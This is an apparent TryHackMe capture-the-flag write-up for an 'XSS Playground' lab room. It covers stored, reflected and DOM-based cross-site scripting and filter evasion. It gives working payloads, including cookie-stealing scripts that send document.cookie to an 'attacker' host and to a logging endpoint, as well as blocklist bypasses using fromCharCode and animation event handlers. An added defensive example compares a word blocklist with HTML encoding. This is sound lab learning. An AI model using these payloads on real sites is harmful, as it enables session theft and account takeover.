**Updated on 23/07/20: I can solve the last task now thanks to Papadopejk**
**This room is broken on Task #8**
[Task 1] Introduction
[Task 2] Deploy your XSS Playground
[Task 3] Stored XSS
1. The machine you deployed earlier will guide you through exploiting some cool vulnerabilities stored XSS has to offer. There are hints for answering these questions on the machine.
2. Add a comment and see if you can insert some of your own HTML. Doing so will reveal the answer to this question.
I used a payload from:
<img src=x onerror=alert('XSS');>
3. Create an alert popup box that appears on the page with your document cookies.
<script>alert(document.cookie);</script>
4. Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.
Right click -> Inspect Element
Element id is “thm-title”.
I used this as a reference to edit the string:
Let’s try it in the browser’s console.
document.getElementById('thm-title').innerHTML="test";
It works.
Let’s inject the script:
<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script>
5. Stored XSS can be used to steal a victim’s cookie (data on a machine that authenticates a user to a webserver). This can be done by having a victim’s browser parse the following JavaScript code:
<script>window.location='http://attacker/cookie='+document.cookie</script>
This script navigates the user’s browser to a different URL; this new request will include the victim’s cookie as a query parameter. When the attacker has acquired the cookie, they can use it to impersonate the victim.
Take over Jack’s account by stealing his cookie, what was his cookie value?
I always use Burp Suite’s sitemap to log the site.
Access logs.
Maybe I can redirect Jack’s cookie here. Let’s click it.
A log appeared.
Back to Stored XSS. Let’s put in the script:
<script>document.location='http://<ip>/log/'+document.cookie</script>
Back to /logs/, refresh the page.
6. Post a comment as Jack.
Change the value to Jack’s and refresh. You will get the answer.
[Task 4] Reflected XSS
1. Craft a reflected XSS payload that will cause a popup saying “Hello”
<script>alert("Hello")</script>
You can see that there’s a request.
2. Craft a reflected XSS payload that will cause a popup with your machine’s IP address.
<script>alert(window.location.hostname)</script>
[Task 5] DOM-Based XSS
1. Look at the deployed machine’s DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
Let’s test it.
test" onmouseover="alert('Hover over the image and inspect the image element')"
Let’s “onmouseover” it. It works.
Let’s exploit it.
test" onmouseover="alert(document.cookie)"
2. Create an onhover event on an image tag that changes the background color of the website to red.
test" onhover="document.body.style.backgroundColor = 'red';
Nothing happened.
Let’s try onmouseover.
test" onmouseover="document.body.style.backgroundColor = 'red';
[Task 6] Using XSS for IP and Port Scanning
[Task 7] XSS Keylogger
[Task 8] Filter Evasion
1. Bypass the filter that removes any script tags.
<img src=x onerror=alert('Hello');>
2. The word alert is filtered, bypass it.
<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,72,101,108,108,111,39,41))";>
No flag. I think this room is broken.
**Update:** I tried this payload.
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
3. The word hello is filtered, bypass it.
— Same script as #2.
**Update:** I tried this payload.
<object onerror=alert('Hello')>
4. Filtered in challenge 4 is as follows:
- word “Hello”
- script
- onerror
- onsubmit
- onload
- onmouseover
- onfocus
- onmouseout
- onkeypress
- onchange
I used a payload from PortSwigger:
Let’s test the payload first:
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
Let’s exploit:
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="eval(String.fromCharCode(97,108,101,114,116,40,39,72,101,108,108,111,39,41))"></xss>
Success!!!
**Update:** I tried this payload.
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
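As an added example (not part of the original writeup or the room), the challenge-4 word blocklist from above is put beside contextual HTML output encoding and both are run over two payloads quoted on this page, to show why the word list lets the animation handler through while encoding makes every sample inert. The filter semantics (case-insensitive, single pass, word deleted) and the helper names are assumptions.

```javascript
// Added example, not code from the room or the original post. Compares a
// blocklist filter modelled on Task 8 challenge 4 with contextual encoding.
// Filter semantics (case-insensitive, one pass) are an assumption.

const CHALLENGE4_BLOCKLIST = [
  "Hello", "script", "onerror", "onsubmit", "onload", "onmouseover",
  "onfocus", "onmouseout", "onkeypress", "onchange",
];

// Weak defence: delete every listed word from the input in a single pass.
function blocklistFilter(input, words = CHALLENGE4_BLOCKLIST) {
  return words.reduce(
    (out, w) => out.replace(new RegExp(w, "gi"), ""),
    input
  );
}

// Stronger defence: encode the five HTML metacharacters so the browser
// renders the text but never parses it as markup (text node / attribute).
function encodeForHtml(input) {
  return input.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// Crude check used only to compare the two defences: is there still a
// tag start that carries some on* event-handler attribute?
function containsEventHandlerTag(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Payloads quoted in the writeup (Task 3 #3 and the Task 8 #4 test payload).
const SAMPLE_PAYLOADS = {
  scriptTag: "<script>alert(document.cookie);</script>",
  animationEnd:
    "<style>@keyframes x{}</style>" +
    "<xss style=\"animation-name:x\" onanimationend=\"alert(1)\"></xss>",
};

// Returns whether each defence leaves an event-handler tag in the output.
function compareDefences(payload) {
  const filtered = blocklistFilter(payload);
  const encoded = encodeForHtml(payload);
  return {
    filtered,
    encoded,
    blocklistStillActive: containsEventHandlerTag(filtered),
    encodedStillActive: containsEventHandlerTag(encoded),
  };
}
```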